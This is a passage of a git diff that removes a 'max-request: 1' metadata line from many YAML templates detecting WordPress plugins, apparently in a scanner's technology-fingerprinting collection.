ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 829edad042..56d2e4efcd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml 